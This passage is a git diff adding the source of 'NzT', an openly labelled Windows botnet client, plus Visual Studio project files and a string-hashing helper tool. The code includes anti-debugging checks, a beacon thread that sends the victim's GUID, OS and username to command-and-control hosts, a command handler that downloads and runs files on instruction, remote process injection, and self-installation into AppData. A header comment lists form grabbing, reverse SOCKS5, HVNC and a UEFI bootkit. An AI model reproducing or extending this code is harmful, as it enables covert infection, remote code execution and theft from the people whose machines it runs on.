Inserts a kernel shellcode stager into ACPI.SYS + * .rsrc section, and directs execution to it. + * +!*/ +D_SEC( B ) VOID EFIAPI OslArchTransferToKernelHook( _In_ PVOID LoaderBlock, _In_ PVOID Entry ); diff --git a/src/Bot/Bot.vcxproj b/src/Bot/Bot.vcxproj new file mode 100644 index 0000000..81d3010 --- /dev/null +++ b/src/Bot/Bot.vcxproj @@ -0,0 +1,213 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 15.0 + {4415A846-1C99-4260-960D-40E141837813} + client + 10.0 + Bot + + + + Application + true + v142 + MultiByte + + + Application + false + v142 + false + MultiByte + false + + + Application + true + v142 + MultiByte + + + Application + false + v142 + true + MultiByte + + + + + + + + + + + + + + + + + + + + + true + false + true + + + false + + + false + C:\Users\user\Documents\NzT\src\Shared;$(IncludePath) + C:\Users\user\Documents\NzT\src\Shared;$(SourcePath) + + + C:\Users\user\Documents\NzT\src\Shared;$(IncludePath) + C:\Users\user\Documents\NzT\src\Shared;$(SourcePath) + + + + Level3 + Disabled + + + false + true + false + Cdecl + Default + C:\Users\x\Documents\Projects\NzT\Shared;%(AdditionalIncludeDirectories) + WIN32;_DEBUG;WIN32_LEAN_AND_MEAN;%(PreprocessorDefinitions) + false + MultiThreadedDebug + + + Console + false + + + crypt32.lib;%(AdditionalDependencies) + true + + + + + Level3 + Disabled + true + true + + + Console + + + + + Level2 + Disabled + true + false + + + false + false + WIN32_LEAN_AND_MEAN + false + false + Cdecl + CompileAsC + C:\Users\x\Documents\Projects\NzT\Shared;%(AdditionalIncludeDirectories) + Default + Size + MultiThreaded + NotUsing + + + -nologo -Gm- -GR- -EHa- -Oi -GS- -Gs9999999 %(AdditionalOptions) + + + Windows + true + true + + + true + true + + + EntryPoint + + + + + true + true + /STACK:0x100000,0x100000 %(AdditionalOptions) + + + true + + + + + Level3 + MaxSpeed + true + true + true + true + + + Console + true + true + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/src/Bot/Bot.vcxproj.filters b/src/Bot/Bot.vcxproj.filters new file mode 100644 index 0000000..8e63a3f --- /dev/null +++ b/src/Bot/Bot.vcxproj.filters @@ -0,0 +1,80 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;ipp;xsd + + + {3b15b3f2-24cc-4e25-a057-57e6df9926df} + + + {7b834a1a-b392-4ded-9aa9-67e9690a8512} + + + {e897b8a8-0247-4bb2-b798-865608ef6a92} + + + {def7c394-4c70-4813-a19d-7497c656d21e} + + + + + Source Files\Network + + + Source Files\Network + + + Source Files\Core + + + Source Files\Network + + + Source Files\Core + + + Source Files\Core + + + Source Files\Core + + + Source Files\Core + + + Source Files\Core + + + + + Header Files\Core + + + Header Files\Network + + + Header Files\Network + + + Header Files\Core + + + Header Files\Core + + + Header Files\Core + + + Header Files\Core + + + Header Files\Core + + + \ No newline at end of file diff --git a/src/Bot/Bot.vcxproj.user b/src/Bot/Bot.vcxproj.user new file mode 100644 index 0000000..6e2aec7 --- /dev/null +++ b/src/Bot/Bot.vcxproj.user @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/src/Bot/antidebug.c b/src/Bot/antidebug.c new file mode 100644 index 0000000..c8dbf7d --- /dev/null +++ b/src/Bot/antidebug.c @@ -0,0 +1,20 @@ +#include + +#include "antidebug.h" +#include "nzt.h" +#include "utils.h" + +BOOL IsBeingDebuggedAlt() +{ + return GetPeb()->BeingDebugged; +} + +WINERROR IsBeingDebugged() +{ + WINERROR Status = NO_ERROR; + + if (IsBeingDebuggedAlt()) + return ERROR_UNSUCCESSFULL; + + return Status; +} \ No newline at end of file diff --git a/src/Bot/antidebug.h b/src/Bot/antidebug.h new file mode 100644 index 0000000..b789603 --- /dev/null +++ b/src/Bot/antidebug.h @@ -0,0 +1,9 @@ +#ifndef __ANTIDEBUG_H__ +#define __ANTIDEBUG_H__ + +#include "nzt.h" + +BOOL IsBeingDebuggedAlt(); +WINERROR IsBeingDebugged(); + +#endif //__ANTIDEBUG_H__ \ No newline at end of file diff --git a/src/Bot/command.c b/src/Bot/command.c new file mode 100644 index 0000000..25cb09c --- /dev/null +++ b/src/Bot/command.c @@ -0,0 +1,35 @@ +#include +#ifdef _DEBUG +#include +#endif + +#include "nzt.h" +#include "command.h" +#include "utils.h" + +VOID CommandExecute( + COMMANDS Command, + PCHAR* Parameter +) +{ + DebugPrint("NzT: Executed command: %d %s", Command, Parameter[2]); + + switch (Command) + { + case COMMAND_DL_EXEC: + { + DownloadFile(Parameter[2], TRUE); + break; + } + + case COMMAND_UPDATE: + { + DownloadFile(Parameter[2], TRUE); + //uninstall and update registry key values to hold new version number + break; + } + + case COMMAND_KILL: + API(ExitProcess(0)); + } +} \ No newline at end of file diff --git a/src/Bot/command.h b/src/Bot/command.h new file mode 100644 index 0000000..23c41fa --- /dev/null +++ b/src/Bot/command.h @@ -0,0 +1,19 @@ +#ifndef __COMMAND_H__ +#define __COMMAND_H__ + +typedef enum +{ + COMMAND_DL_EXEC = 0x992c01, + COMMAND_UPDATE = 0xba1af8, + COMMAND_LOAD_PLUGIN = 0xbfc330, + COMMAND_KILL = 0x2fe86c, + COMMAND_UNINSTALL = 0xa2327f +} COMMANDS; + +VOID CommandExecute( + COMMANDS Command, + PCHAR* Parameter +); + + +#endif //__COMMAND_H__ \ No newline at end of file diff --git a/src/Bot/globals.c b/src/Bot/globals.c new file mode 100644 index 0000000..58f3478 --- /dev/null +++ b/src/Bot/globals.c @@ -0,0 +1,87 @@ +#include +#include +#ifdef _DEBUG +#include +#endif + +#include "nzt.h" +#include "crt.h" +#include "globals.h" +#include "guid.h" +#include "utils.h" +#include "config.h" + +DWORD g_CurrentProcessId = 0; +LPWSTR g_CurrentProcessPath = 0; +LPTSTR g_CurrentProcessName = 0; +HMODULE g_CurrentProcessModule = 0; +HMODULE g_CurrentModule = 0; + +LPTSTR g_BotGuid = 0; +DWORD g_BotOS = 0; +DWORD g_BotArch = 0; +LPTSTR g_BotUsername = 0; +DWORD g_BotGroupId = 0; +LPWSTR g_BotInstallPath = 0; + +HANDLE g_ShutdownEvent = 0; +HANDLE g_MainMutex = 0; + +VOID GlobalsRelease() +{ + if (g_CurrentProcessPath) + Free(g_CurrentProcessPath); + + if (g_ShutdownEvent) + API(CloseHandle(g_ShutdownEvent)); +} + +BOOL GlobalsInitialize(HMODULE CurrentModule, ULONG Flags) +{ + BOOL Status = TRUE; + + g_CurrentModule = CurrentModule; + g_CurrentProcessModule = API(GetModuleHandleW)(NULL); + g_CurrentProcessId = API(GetCurrentProcessId)(); + + g_BotGuid = GetBotGuid(); + g_BotGroupId = 0; + g_BotUsername = GetUsername(); + g_BotInstallPath = NULL; + + do + { + /*if (Flags & G_SHUTDOWN_EVENT) + { + if (!(g_ShutdownEvent = CreateEvent(NULL, TRUE, FALSE, 0))) + { + Status = GetLastError(); + DebugPrint("Globals: Initialized ShutdownEvent failed with status: %u", Status); + break; + } // G_SHUTDOWN_EVENT + }*/ + + if (Flags & G_SYSTEM_VERSION) + { + g_BotOS = GetOperatingSystem(); + g_BotArch = Is64Bit(); + } + + if (Flags & G_CURRENT_PROCESS_ID) + g_CurrentProcessId = API(GetCurrentProcessId)(); + + if (Flags & G_CURRENT_PROCESS_PATH) + { + if (!GetModulePath(API(GetModuleHandleW)(NULL), &g_CurrentProcessPath, FALSE)) + { + Status = FALSE; + DebugPrint("NzT: Failed to initialize current process path!"); + } + } + } while (FALSE); + + if (Status != TRUE) + GlobalsRelease(); + + return Status; +} \ No newline at end of file diff --git a/src/Bot/globals.h b/src/Bot/globals.h new file mode 100644 index 0000000..9eb088f --- /dev/null +++ b/src/Bot/globals.h @@ -0,0 +1,27 @@ +#ifndef __GLOBALS_H__ +#define __GLOBALS_H__ + +#define G_SYSTEM_VERSION 1 // OS version +#define G_CURRENT_PROCESS_ID 2 // Current process ID +#define G_CURRENT_MODULE_PATH 4 // Current module full path for DLL (equal to G_PROCESS_MODULE_PATH for EXE) +#define G_CURRENT_PROCESS_PATH 8 // Current process module full path (for both DLL and EXE) +#define G_SHUTDOWN_EVENT 0x10 // Application shutdown event + + +extern DWORD g_CurrentProcessId; +extern LPWSTR g_CurrentProcessPath; +extern LPTSTR g_CurrentProcessName; + +extern LPTSTR g_BotGuid; +extern DWORD g_BotOS; +extern DWORD g_BotArch; +extern LPTSTR g_BotUsername; +extern LPWSTR g_BotInstallPath; + +extern HANDLE g_ShutdownEvent; +extern HANDLE g_MainMutex; + +VOID GlobalsRelease(); +BOOL GlobalsInitialize(HMODULE CurrentModule, ULONG Flags); + +#endif //__GLOBALS_H__ \ No newline at end of file diff --git a/src/Bot/http.c b/src/Bot/http.c new file mode 100644 index 0000000..b6d6dd8 --- /dev/null +++ b/src/Bot/http.c @@ -0,0 +1,120 @@ +#include +#include + +#include "nzt.h" +#include "http.h" +#include "utils.h" + +HINTERNET HttpConnect( + LPSTR UserAgent, + LPSTR Host, + WORD Port, + DWORD Flags +) +{ + HINTERNET Internet = 0; + HINTERNET Connect = 0; + + do + { + Internet = API(InternetOpenW(L"NzT", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0)); + if (Internet == NULL) + break; + + Connect = API(InternetConnectA(Internet, Host, 80, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 1)); + if (Connect == NULL) + break; + } while (FALSE); + + return Connect; +} + +HINTERNET HttpRequest( + HINTERNET Connect, + BOOL bPost, + LPSTR URI, + LPSTR Referrer, + PCHAR Data, + DWORD Flags +) +{ + HINTERNET Request = 0; + DWORD Size = sizeof(DWORD); + DWORD Status = 0; + BOOL Send = FALSE; + + static LPSTR AcceptTypes[2] = { "*/*", NULL }; + static TCHAR Header[] = ("Content-Type: application/x-www-form-urlencoded"); + + do + { + Request = API(HttpOpenRequestA(Connect, "POST", URI, NULL, NULL, AcceptTypes, 0, 1)); + if (Request == NULL) + break; + + Send = API(HttpSendRequestA(Request, Header, StringLengthA(Header), Data, StringLengthA(Data))); + if (Send == FALSE) + break; + + return Request; + + } while (FALSE); + + return NULL; +} + +BOOL HttpReceiveData(HINTERNET Request, PCHAR* Buffer) +{ + CHAR Data[256] = { 0 }; + DWORD Received = 0; + DWORD Read = 0; + + ZeroMemory(&Data, sizeof(Data)); + + while (API(InternetReadFile(Request, Data, 256 - 1, &Received)) && Received != 0) + { + if (!ReallocEx(&(*Buffer), Read + Received + 1)) + return FALSE; + + MemoryCopy((*Buffer) + Read, &Data, Received); + ZeroMemory(&Data, sizeof(Data)); + } + + return TRUE; +} + +BOOL HttpPostRequest( + PCHAR Host, + PCHAR URI, + PCHAR Data, + PCHAR* Response +) +{ + HINTERNET Connect = 0; + HINTERNET Request = 0; + BOOL Status = FALSE; + + do + { + Connect = HttpConnect(HTTP_USER_AGENT, Host, INTERNET_DEFAULT_HTTP_PORT, 0); + if (Connect == NULL) + break; + + Request = HttpRequest(Connect, TRUE, URI, NULL, Data, 0); + if (Request == NULL) + break; + + Status = HttpReceiveData(Request, Response); + } while (FALSE); + + if (!Status) + DebugPrint("NzT: HttpPostRequest() failed!"); + + if (Connect != NULL) + API(InternetCloseHandle(Connect)); + + if (Request != NULL) + API(InternetCloseHandle(Request)); + + return Status; +} diff --git a/src/Bot/http.h b/src/Bot/http.h new file mode 100644 index 0000000..1957d99 --- /dev/null +++ b/src/Bot/http.h @@ -0,0 +1,15 @@ +#ifndef __HTTP_H__ +#define __HTTP_H__ + +#define HTTP_USER_AGENT "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; NzT)" +#define HTTP_BUFFER_SIZE 4096 + +/* Functions */ +BOOL HttpPostRequest( + PCHAR Host, + PCHAR URI, + PCHAR Data, + PCHAR* Response +); + +#endif //__HTTP_H__ \ No newline at end of file diff --git a/src/Bot/injection.c b/src/Bot/injection.c new file mode 100644 index 0000000..c0eb692 --- /dev/null +++ b/src/Bot/injection.c @@ -0,0 +1,177 @@ +#include + +#include "nzt.h" +#include "utils.h" + +LPVOID GetImageBase(LPVOID ProcessAddress) +{ + LPBYTE Address = (LPBYTE)ProcessAddress; + Address = (LPBYTE)((SIZE_T)Address & 0xFFFFFFFFFFFF0000); + + for (;;) + { + PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)Address; + if (DosHeader->e_magic == IMAGE_DOS_SIGNATURE) + { + if (DosHeader->e_lfanew < 0x1000) + { + PIMAGE_NT_HEADERS NtHeaders = (PIMAGE_NT_HEADERS)&((unsigned char*)Address)[DosHeader->e_lfanew]; + if (NtHeaders->Signature == IMAGE_NT_SIGNATURE) + break; + } + } + + Address -= 0x1000; + } + + return Address; +} + +VOID ProcessRelocation(PIMAGE_BASE_RELOCATION Relocation, DWORD ImageBase, DWORD Delta, DWORD Size) +{ + PIMAGE_FIXUP_ENTRY Fixup; + DWORD PointerRva; + PIMAGE_BASE_RELOCATION LocalRelocation = Relocation; + + while ((DWORD)LocalRelocation - (DWORD)Relocation < Size) + { + if (!LocalRelocation->SizeOfBlock) + break; + + Fixup = (PIMAGE_FIXUP_ENTRY)((ULONG)LocalRelocation + sizeof(IMAGE_BASE_RELOCATION)); + for (ULONG r = 0; r < (LocalRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1; r++) + { + PointerRva = LocalRelocation->VirtualAddress + Fixup->Offset; + if (Fixup->Type == IMAGE_REL_BASED_HIGHLOW) + *(PULONG)((ULONG)ImageBase + PointerRva) += Delta; + + Fixup++; + } + + LocalRelocation = (PIMAGE_BASE_RELOCATION)((ULONG)LocalRelocation + LocalRelocation->SizeOfBlock); + } + + return; +} + +LPVOID InjectData( + HANDLE Process, + LPVOID Data, + DWORD Size +) +{ + LPVOID Address; + + if ((Address = NzT.Api.pVirtualAllocEx(Process, NULL, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL) + return NULL; + + if (!NzT.Api.pWriteProcessMemory(Process, Address, Data, Size, NULL)) + { + NzT.Api.pVirtualFreeEx(Process, Address, Size, MEM_RELEASE); + return NULL; + } + + return Address; +} + +DWORD InjectCode(HANDLE Process, LPVOID Function) +{ + HANDLE Map, RemoteThread, Mutex, RemoteMutex; + DWORD Base, Size, ViewSize, NewBaseAddress, Address, ProcessId; + LPVOID View; + NTSTATUS Status; + PIMAGE_DOS_HEADER DosHeader; + PIMAGE_NT_HEADERS NtHeaders; + ULONG RelativeRva, RelativeSize; + + do + { + Map = 0; + RemoteThread = 0; + View = NULL; + Mutex = 0; + RemoteMutex = 0; + + if ((ProcessId = GetProcessIdByHandle(Process)) == -1) + break; + + if ((Mutex = CreateMutexOfProcess(ProcessId)) == 0) + break; + + if (!NzT.Api.pDuplicateHandle(NzT.Api.pGetCurrentProcess(), Mutex, Process, &RemoteMutex, 0, FALSE, DUPLICATE_SAME_ACCESS)) + break; + + Base = (DWORD)GetImageBase(Function); + Size = ((PIMAGE_OPTIONAL_HEADER)((LPVOID)((PBYTE)(Base)+((PIMAGE_DOS_HEADER) + (Base))->e_lfanew + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER))))->SizeOfImage; + + if ((Map = NzT.Api.pCreateFileMappingW(NzT.Api.pGetCurrentProcess() + , NULL, PAGE_EXECUTE_READWRITE, 0, Size, NULL)) == 0) + break; + + if ((View = NzT.Api.pMapViewOfFile(Map, FILE_MAP_WRITE, 0, 0, 0)) == NULL) + break; + + MemoryCopy(View, (LPVOID)Base, Size); + + ViewSize = 0; + NewBaseAddress = 0; + + if ((Status = (NTSTATUS)NzT.Api.pNtMapViewOfSection(Map, Process, (PVOID*)&NewBaseAddress, 0, Size, + NULL, &ViewSize, (SECTION_INHERIT)1, 0, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) + break; + + DosHeader = (PIMAGE_DOS_HEADER)Base; + NtHeaders = NtHeaders = (PIMAGE_NT_HEADERS)RVATOVA(Base, DosHeader->e_lfanew); + + RelativeRva = NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress; + RelativeSize = NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + + ProcessRelocation((PIMAGE_BASE_RELOCATION)(Base + RelativeRva), (DWORD)View, NewBaseAddress - Base, RelativeSize); + + Address = (DWORD)Function - Base + NewBaseAddress; + } while (FALSE); + + if (Mutex != 0) + API(CloseHandle)(Mutex); + + if (Map != 0) + API(CloseHandle)(Map); + + if (RemoteThread != 0) + API(CloseHandle)(RemoteThread); + + if (View != NULL) + API(UnmapViewOfFile)(View); + + return Address; +} + +BOOL InjectBot(DWORD ProcessId, LPTHREAD_START_ROUTINE Thread) +{ + DWORD Address; + HANDLE RemoteThread, Process; + BOOL Injected = FALSE; + + if ((Process = NzT.Api.pOpenProcess(PROCESS_QUERY_INFORMATION | + PROCESS_VM_OPERATION | + PROCESS_VM_WRITE | + PROCESS_VM_READ | + PROCESS_CREATE_THREAD | + PROCESS_DUP_HANDLE + ,FALSE, ProcessId)) == 0) + return FALSE; + + if ((Address = InjectCode(Process, Thread)) == 0) + return FALSE; + + if ((RemoteThread = API(CreateRemoteThread)(Process, NULL, 0, (LPTHREAD_START_ROUTINE)Address, NULL, 0, NULL)) != 0) + { + NzT.Api.pCloseHandle(RemoteThread); + Injected = TRUE; + } + + API(CloseHandle)(Process); + + return Injected; +} \ No newline at end of file diff --git a/src/Bot/injection.h b/src/Bot/injection.h new file mode 100644 index 0000000..27e39e9 --- /dev/null +++ b/src/Bot/injection.h @@ -0,0 +1,6 @@ +#ifndef __INJECTION_H__ +#define __INJECTION_H__ + +BOOL InjectBot(DWORD ProcessId, LPTHREAD_START_ROUTINE Thread); + +#endif //__INJECTION_H__ \ No newline at end of file diff --git a/src/Bot/install.c b/src/Bot/install.c new file mode 100644 index 0000000..2531343 --- /dev/null +++ b/src/Bot/install.c @@ -0,0 +1,136 @@ +#include + +#include "install.h" +#include "nzt.h" +#include "crt.h" +#include "utils.h" +#include "config.h" +#include "strings.h" +#include "globals.h" +#include "file.h" +#include "registry.h" + +static DWORD GenerateBotFileName(PDWORD Seed) +{ + return(*Seed = 1664525 * (*Seed)); +} + +LPWSTR GetBotFileName(PDWORD Seed) +{ + DWORD FileName = 0, + FileNameLength = 0; + wchar_t FileNameString[32] = { 0 }; + + FileName = GenerateBotFileName(Seed); + + MemoryZero(&FileNameString, sizeof(FileNameString)); + + if ((FileNameLength = API(wsprintfW)(FileNameString, L"%x", FileName)) > 0) + return StringCopyW(FileNameString, FileNameLength); + + return NULL; +} + +LPWSTR GetBotDirectory() +{ + LPWSTR AppData = NULL, + DirectoryName = NULL; + BOOL Status = FALSE; + + if ((DirectoryName = GetBotFileName(GetSerialNumber())) == NULL) + return NULL; + + if ((AppData = GetDirectoryPath(PATH_APPDATA)) != NULL) + Status = StringConcatW(&AppData, DirectoryName); + + Free(DirectoryName); + + if (!Status) + { + Free(AppData); + AppData = NULL; + } + + return AppData; +} + +LPWSTR GetBotPath() +{ + LPWSTR Directory = NULL, + FileName = NULL; + BOOL Status = FALSE; + + if ((FileName = GetBotFileName(GetSerialNumber())) == NULL) + return NULL; + + if ((Directory = GetBotDirectory()) != NULL) + Status = StringConcatW(&Directory, WSTRING_BACKSLASH) && StringConcatW(&Directory, FileName) && + StringConcatW(&Directory, WSTRING_DOT_EXE); + + Free(FileName); + + if (!Status) + { + Free(Directory); + Directory = NULL; + } + + return Directory; +} + +BOOL IsSystemInfected() +{ + BOOL Infected = FALSE; + LPWSTR Path = NULL; + + if ((Path = GetBotPath()) == NULL) + return FALSE; + + Infected = StringCompareW(g_BotInstallPath, Path); + + Free(Path); + return Infected; +} + +//setup auto-start registry +//persistence keys +//config keys +//setup dynamic config +BOOL InstallBot() +{ + LPWSTR Path = NULL, + Directory = NULL, + Key = NULL, + Config = NULL; + + if ((Directory = GetBotDirectory()) == NULL) + return FALSE; + + Path = GetBotPath(); + if (Path != NULL) + { + DosPathToNtPath(&Path); + DosPathToNtPath(&Directory); + + if (FileCreateDirectory(Directory)) + { + DosPathToNtPath(&g_CurrentProcessPath); + FileCopy(g_CurrentProcessPath, Path, TRUE); + DebugPrintW(L"NzT: Install location: %ls", Path); + g_BotInstallPath = Path; + return TRUE; + } + } + + DebugPrintW(L"NzT: Failed to install at :%ls", Path) + + return FALSE; +} + +BOOL UninstallBot() +{ + LPWSTR Path = NULL, + Directory = NULL; + + return FALSE; +} \ No newline at end of file diff --git a/src/Bot/install.h b/src/Bot/install.h new file mode 100644 index 0000000..05316bc --- /dev/null +++ b/src/Bot/install.h @@ -0,0 +1,10 @@ +#ifndef __INSTALL_H__ +#define __INSTALL_H__ + +LPWSTR GetBotFileName(PDWORD Seed); +LPWSTR GetBotDirectory(); +LPWSTR GetBotPath(); +BOOL IsSystemInfected(); +BOOL InstallBot(); + +#endif //__INSTALL_H__ \ No newline at end of file diff --git a/src/Bot/nzt.c b/src/Bot/nzt.c new file mode 100644 index 0000000..c7ec777 --- /dev/null +++ b/src/Bot/nzt.c @@ -0,0 +1,121 @@ +/* +* - CORE +* [X] - HTTP/HTTPS secure C2 communication +* - Server -> Generate RSA keypair +* - Client -> Generate AES keypair -> Encrypt with server RSA keypair +* - Client -> Encrypt data + keypair -> send AES keypair to server -> Server decrypts encrypted key, and decrypts data +* [X] - Dynamic hashed API calls (Hell's Gate) +* [X] - Dynamic configuration +* [X] - x86<=>x64 process injection +* [X] - Hooking engine +* [X] - Anti-Hooking engine +* [X] - Modular plugin system +* [X] - Store and encrypt strings in seperate PE section +* [X] - UEFI Kit +* +* - PLUGINS +* [X] Form Grabber +* [X] Reverse Socks5 +* [X] HVNC +*/ +#include + +#include "crt.h" +#include "nzt.h" +#include "globals.h" +#include "report.h" +#include "antidebug.h" +#include "injection.h" +#include "utils.h" +#include "guid.h" +#include "install.h" +#include "config.h" + +NzT_T NzT; + +int BookitInitialize(); + +static WINERROR BotInitialize() +{ + WINERROR Status = NO_ERROR; + + MemoryZero(&NzT, sizeof(NzT_T)); + + // Check if NzT has a debugger detached, DestroyOS if true + if (IsBeingDebugged()) + { + DebugPrint("NzT: Possible debugging detected, exiting..."); + return ERROR_UNSUCCESSFULL; + } + + // Dynamically resolve all Windows API function by hash + if (!ApiInitialize()) + { + DebugPrint("NzT: failed to initialize API!"); + return ERROR_UNSUCCESSFULL; + } + + // Make sure only one instance + if (!(g_MainMutex = API(CreateMutexW)(NULL, FALSE, L"g_MainMutex")) || ((Status = API(GetLastError)()) == ERROR_ALREADY_EXISTS)) + { + Status = FALSE; + DebugPrint("NzT: Error Mutex already exists, NzT is already running!"); + return ERROR_UNSUCCESSFULL; + } + + // Initinalize global variables + if (!GlobalsInitialize(API(GetModuleHandleW(NULL)), G_SYSTEM_VERSION | G_CURRENT_PROCESS_ID | G_CURRENT_PROCESS_PATH)) + { + DebugPrint("NzT: Failed to initialize globals!"); + return ERROR_UNSUCCESSFULL; + } + + DebugPrint("NzT: Initialized!"); + + // Start NzT EFI Bootkit + BookitInitialize(); + +#ifdef _REPORT + StartReportThread(); +#endif + +#ifdef _INSTALL + if (!IsSystemInfected()) + { + NzT.Type = NEW_INFECTION; + InstallBot(); + } + else + { + NzT.Type = RUNNING_INFECTION; + } +#endif + + return Status; +} + +WINERROR BotShutdown() +{ + WINERROR Status = NO_ERROR; + + DebugPrint("NzT: Shutdown initiated"); + + if (g_ShutdownEvent) + { + API(SetEvent)(g_ShutdownEvent); + } + + if (g_MainMutex) + { + API(ReleaseMutex(g_MainMutex)); + API(CloseHandle(g_MainMutex)); + } + + return Status; +} + +INT EntryPoint() +{ + BotInitialize(); + return 0; +} diff --git a/src/Bot/report.c b/src/Bot/report.c new file mode 100644 index 0000000..226972f --- /dev/null +++ b/src/Bot/report.c @@ -0,0 +1,109 @@ +#include +#ifdef _DEBUG +#include +#endif + +#include "report.h" +#include "config.h" +#include "http.h" +#include "nzt.h" +#include "crt.h" +#include "utils.h" +#include "globals.h" +#include "command.h" +#include "strings.h" + +long _atoi(const char* S) +{ + long num = 0; + int i = 0; + + // run till the end of the string is reached, or the + // current character is non-numeric + while (S[i] && (S[i] >= '0' && S[i] <= '9')) + { + num = num * 10 + (S[i] - '0'); + i++; + } + + return num; +} + +VOID ProcessServerResponse(CONST PCHAR Response) +{ + PCHAR Data[512] = { 0 }; + PCHAR Token = NULL; + INT Parameters = 0; + + MemoryZero(&Data, sizeof(Data)); + + Token = StringTokenizeA(Response, "|"); + do + { + if (Parameters >= sizeof(Data) / sizeof(CHAR)) + break; + Data[Parameters++] = Token; + } while (Token = StringTokenizeA(NULL, "|")); + + + if (!StringCompareA(Data[0], "COMMAND")) + CommandExecute(_atoi(Data[1]), Data); + else if (!StringCompareA(Data[0], "ERROR")) + DebugPrint("NzT: Report Error! Data: %s\n", Data); +} + +DWORD ReportThread() +{ + PCHAR Response = NULL; + static CHAR Data[512] = { 0 }; + INT CurrentHost = 0; + + while (TRUE) + { + MemoryZero(&Data, sizeof(Data)); + + if (NzT.Type == NEW_INFECTION) + API(wsprintfA)(Data, STRING_REPORT_DATA, NEW_INFECTION, g_BotGuid, g_BotOS, g_BotArch, g_BotUsername); + else + API(wsprintfA)(Data, STRING_REPORT_DATA, RUNNING_INFECTION, g_BotGuid, g_BotOS, g_BotArch, g_BotUsername); + + do + { + if (!HttpPostRequest(g_Hosts[CurrentHost], STRING_REPORT_GATE_URL, Data, &Response)) + { + DebugPrint("NzT: Failed to report to %s%s", g_Hosts[CurrentHost], STRING_REPORT_GATE_URL); + CurrentHost++; + break; + } + + DebugPrint("NzT: Reported to %s%s", g_Hosts[CurrentHost], STRING_REPORT_GATE_URL); + + if (Response == NULL) + break; + + DebugPrint("NzT: Server Response %s", Response); + ProcessServerResponse(Response); + } while (FALSE); + + if (Response != NULL) + { + Free(Response); + Response = NULL; + } + + if (CurrentHost == g_NumberHosts) + CurrentHost = 0; + + _Sleep(REPORT_TIME * 60000); + } + + return 0; +} + +BOOL StartReportThread(void) +{ + if ((API(CreateThread)(0, 0, (LPTHREAD_START_ROUTINE)ReportThread, 0, 0, 0)) != 0) + return TRUE; + + return FALSE; +} \ No newline at end of file diff --git a/src/Bot/report.h b/src/Bot/report.h new file mode 100644 index 0000000..b408a27 --- /dev/null +++ b/src/Bot/report.h @@ -0,0 +1,6 @@ +#ifndef __REPORT_H__ +#define __REPORT_H__ + +BOOL StartReportThread(void); + +#endif //__REPORT_H__ \ No newline at end of file diff --git a/src/Bot/shared.c b/src/Bot/shared.c new file mode 100644 index 0000000..60da595 --- /dev/null +++ b/src/Bot/shared.c @@ -0,0 +1,39 @@ +#ifndef __SHARED_H__ +#define __SHARED_H__ + +#include "..\Shared\config.c" +#include "..\Shared\crt.c" +#include "..\Shared\api.c" +#include "..\Shared\utils.c" +#include "..\Shared\crypto.c" +#include "..\Shared\guid.c" +#include "..\Shared\file.c" +#include "..\Shared\registry.c" + +#ifdef _DEBUG +#else +#pragma function(memset) +void *memset(void *dest, int c, size_t count) +{ + char *bytes = (char *)dest; + while (count--) + { + *bytes++ = (char)c; + } + return dest; +} + +#pragma function(memcpy) +void *memcpy(void *dest, const void *src, size_t count) +{ + char *dest8 = (char *)dest; + const char *src8 = (const char *)src; + while (count--) + { + *dest8++ = *src8++; + } + return dest; +} +#endif + +#endif //__SHARED_H__ \ No newline at end of file diff --git a/src/Encryptor/Encryptor.c b/src/Encryptor/Encryptor.c new file mode 100644 index 0000000..8a8c572 --- /dev/null +++ b/src/Encryptor/Encryptor.c @@ -0,0 +1,39 @@ +#include +#include + +#include "..\Shared\crt.c" +#include "..\Shared\api.c" +#include "..\Shared\utils.c" +#include "..\Shared\crypto.c" +#include "..\Shared\registry.c" + +NzT_T NzT; + +int main(int argc, char **argv) +{ + CHAR Buffer[256] = { 0 }; + DWORD Hash = 0; + + if (argc < 2) + { + printf("Usage: Encryptor.exe [-a,-s,-x]\n -a [function name]\n\t-Get Crc32 hash of API function\n -s [string]\n\t-Encrypt string with RC4"); + } + + MemoryZero(&NzT, sizeof(NzT_T)); + MemoryZero(&Buffer, sizeof(Buffer)); + + if (!ApiInitialize()) + return -1; + + if (!strcmp(argv[1], "-a")) + { + if (argv[2] == NULL) + return -1; + + Hash = Crc32Hash(argv[2], strlen(argv[2])); + wsprintfA(Buffer, "%s 0x%lX", CharUpperA(argv[2]), Hash); + } + + printf("%s\n", Buffer); + return 0; +} diff --git a/src/Encryptor/Encryptor.vcxproj b/src/Encryptor/Encryptor.vcxproj new file mode 100644 index 0000000..43f4b08 --- /dev/null +++ b/src/Encryptor/Encryptor.vcxproj @@ -0,0 +1,159 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + 15.0 + {7931DABA-686D-4B7A-BEF9-DD52F1469367} + Win32Proj + Encryptor + 10.0 + + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + Application + true + v142 + Unicode + + + Application + false + v142 + true + Unicode + + + + + + + + + + + + + + + + + + + + + true + + + true + + + false + + + false + + + + + + Level3 + Disabled + true + WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + + + Level3 + Disabled + true + _DEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + + + + + + + Level3 + MaxSpeed + true + true + true + WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + Level3 + MaxSpeed + true + true + true + 